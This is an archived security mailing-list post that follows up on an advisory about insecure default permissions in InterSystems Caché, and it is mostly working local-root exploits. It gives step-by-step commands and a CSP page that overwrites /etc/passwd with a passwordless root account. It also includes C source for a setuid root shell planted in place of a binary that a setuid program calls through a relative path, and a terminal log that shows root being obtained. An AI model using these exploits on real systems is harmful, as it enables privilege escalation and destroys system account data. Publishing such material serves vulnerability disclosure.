lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
From: lwc at vapid.ath.cx (Larry W. Cashdollar)
Subject: Re: iDEFENSE Security Advisory 07.01.03: Caché Insecure Installation File and Directory Permissions


Here are more details of my research...


Vuln1

  Local attackers can exploit this to manipulate directories and binaries
inside the installation tree.  This may be used by a local malicious user
to gain root access.   The content in /cachesys/csp/user is executed as
root
through the web interface. user's parent directory (csp) is world
writeable allowing a local non root user to move user aside, copy its
contents and create a new writeable user directory.

1. mv /cachesys/csp/user /cachesys/csp/user.old
2. cp -rp /cachesys/csp/user /cachesys/csp/user.old
3. cp cspexp.csp /cachesys/csp/user
4. lnyx http://localhost/csp/user/cspexp.csp
5. su - cache

<------------------cspexp.csp------------->

<html>

Intersystems Cache' local root exploit.
Larry W. Cashdollar
http://vapid.dhs.org

Because of poor default file and directory permissions a localuser can
execute
code as root via the cache CSP interpreter.
<HR>
Attempting to overwrite /etc/passwd with cache::0:0:root:/root:/bin/bash.

 <script language=Cache runat=server>
     Set cdef=##class(%Library.File).%New("/etc/passwd")
     Do cdef.Open("WSN")
     Do cdef.WriteLine("cache::0:0:root:/root:/bin/bash")
     Do cdef.%Close()
    </script>

</html>


Vuln 2
---------
A user who is a member of the group configured at installation to start
and stop the cache database can get local root access by exploting poor
file permissions and the use of relative path names in setuid binaries.

Using the following method.

1. mv /path/to/cache/bin/cache /path/to/cache/bin/cache.orig
2. cd /path/to/cache/bin
3. cat cache.c << -EOF-
#include <stdio.h>

int main(void) {
setuid(0);setgid(0);
system("/bin/sh");
}
-EOF-
4. gcc cache.c -o cache
5. ./cuxs

Details:

cuxs is setuid root and can be configured as executeable by a specific
group upon installation of Cache' database.

cuxs is a control program for Cache, it executes Cache using the following
system call:
execve("../bin/cache",["cache"],...
since by default bin is world write able the binary cache can be moved and
replaced by a malicous one.

[lwc@...reguard lwc]$ cd /usr/ecache
[lwc@...reguard ecache]$ ls -ld bin;cd bin
drwxrwxrwx    2 root     root         4096 Mar 18 07:13 bin
[lwc@...reguard bin]$ mv cache cache.orig
[lwc@...reguard bin]$ gcc cache.c -o cache
[lwc@...reguard bin]$ id
uid=500(lwc) gid=500(lwc) groups=500(lwc),10(wheel)
[lwc@...reguard bin]$ ls -l cuxs
-rwsr-x---    1 root     wheel       16488 Mar 18 06:49 cuxs
[lwc@...reguard bin]$ ./cuxs
sh-2.05a# id
uid=0(root) gid=0(root) groups=500(lwc),10(wheel)
sh-2.05a#

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ